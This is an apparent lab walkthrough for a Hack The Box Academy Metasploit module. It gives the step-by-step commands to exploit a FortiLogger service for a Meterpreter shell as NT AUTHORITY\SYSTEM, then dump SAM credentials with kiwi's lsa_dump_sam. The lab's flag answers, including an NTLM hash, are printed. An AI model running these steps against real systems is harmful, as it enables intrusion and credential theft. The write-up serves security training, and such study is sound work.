Meterpreter — Using the Metasploit Framework Module — HTB Walkthrough

TIER 0 MODULE: USING THE METASPLOIT FRAMEWORK

SECTION: Meterpreter

Please open your pwnbox or connect to the vpn in order to complete the tasks.

If you are not registered in HTB Academy, then use this link to register now: https://referral.hackthebox.com/mzxKOJt

1. Find the existing exploit in MSF and use it to get a shell on the target. What is the username of the user you obtained a shell with?

Focus on the previous question (from previous section, ‘Sessions’), what it says. “Specific Web Application” that we can find (the name) in the source code. Let’s run a quick nmap scan.

nmap -sV -n <target-ip>

See? We found a service which uses ‘http’ at port 5000. Let’s visit it’s webpage and source code.

view-source:<target-ip>:<port>

We obtained a name ‘FortiLogger’ from the source, let’s look for an exploit.

> msfconsole -q
> search FortiLogger

We found some exploit

And we will use it.

use 0

Prepare for an attack (configuration).

set rhost <target-ip>

Set the attacker device IP.

set lhost <your-vpn-ip>

Then start the attack,

run

After connecting meterpreter, run

getuid

to obtain the username.

Answer: NT AUTHORITY\SYSTEM

2. Retrieve the NTLM password hash for the “htb-student” user. Submit the hash as the answer.

On the same session in metasploit’s meterpreter, enter.

lsa_dump_sam

It says that it needs to load a extension named ‘kiwi’ so, we will load it.

load kiwi

Run again,

lsa_dump_sam

Look for NTLM password of ‘htb-student’ in the content.

Answer: cf3a5525ee9414229e66279623ed5c58

Still stuck? Watch video!

☣️ HAPPY ETHICAL HACKING ☣️

DISCLAIMER: THIS CONTENT DOES NOT BELONG TO ME, I AM JUST WRITING A WALK-THROUGH OF A FREE MODULE OF HACK THE BOX ACADEMY. (WRITING WALKTHROUGHS OF FREE MODULES IS PERMITTED BY HTB ACADEMY)

The Malware Mender Walkthroughs